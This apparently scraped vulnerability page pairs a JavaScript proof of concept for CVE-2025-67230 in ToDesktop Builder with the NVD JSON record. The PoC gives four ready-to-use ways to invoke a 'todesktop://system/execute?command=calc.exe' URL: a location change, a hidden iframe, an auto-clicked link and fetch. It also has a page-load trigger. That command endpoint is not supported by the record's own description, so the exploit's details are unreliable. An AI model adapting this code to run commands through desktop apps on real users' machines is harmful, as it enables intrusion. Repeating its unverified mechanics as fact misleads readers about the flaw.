CVE-2025-67230

// CVE-2025-67230 PoC - ToDesktop Builder Custom URL Scheme Handler Exploitation // This PoC demonstrates the improper permission validation in Custom URL Scheme handler // Method 1: Using window.location to invoke external protocol function exploitViaLocation() { // Construct malicious URL to trigger protocol handler without proper validation const maliciousURL = 'todesktop://system/execute?command=calc.exe'; window.location = maliciousURL; } // Method 2: Using iframe to invoke protocol function exploitViaIframe() { const iframe = document.createElement('iframe'); iframe.src = 'todesktop://system/execute?command=calc.exe'; iframe.style.display = 'none'; document.body.appendChild(iframe); // Clean up after trigger setTimeout(() => iframe.remove(), 1000); } // Method 3: Using anchor element with auto-click function exploitViaAnchor() { const anchor = document.createElement('a'); anchor.href = 'todesktop://system/execute?command=calc.exe'; anchor.click(); } // Method 4: Using fetch for protocol invocation (if supported) async function exploitViaFetch() { try { await fetch('todesktop://system/execute?command=calc.exe', { method: 'GET', mode: 'no-cors' }); } catch (e) { console.log('Protocol invoked via fetch'); } } // Auto-trigger on page load document.addEventListener('DOMContentLoaded', () => { // Uncomment the desired exploitation method // exploitViaLocation(); // exploitViaIframe(); // exploitViaAnchor(); // exploitViaFetch(); console.log('CVE-2025-67230 PoC loaded - ToDesktop Builder vulnerability'); });

{"cve": {"id": "CVE-2025-67230", "sourceIdentifier": "[email protected]", "published": "2026-01-23T17:16:07.840", "lastModified": "2026-01-29T18:43:25.733", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper permissions in the handler for the Custom URL Scheme in ToDesktop Builder v0.33.0 allows attackers with renderer-context access to invoke external protocol handlers without sufficient validation."}, {"lang": "es", "value": "Permisos incorrectos en el manejador para el Esquema de URL Personalizado en ToDesktop Builder v0.33.0 permite a los atacantes con acceso de contexto de renderizador invocar manejadores de protocolo externos sin validación suficiente."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-276"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:todesktop:builder:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.33.0", "matchCriteriaId": "602B8526-D9D2-44B6-BD5A-9B4CF9CB6FCF"}]}]}], "references": [{"url": "https://www.todesktop.com/changelog", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://www.todesktop.com/security/advisories/TDSA-2025-002", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}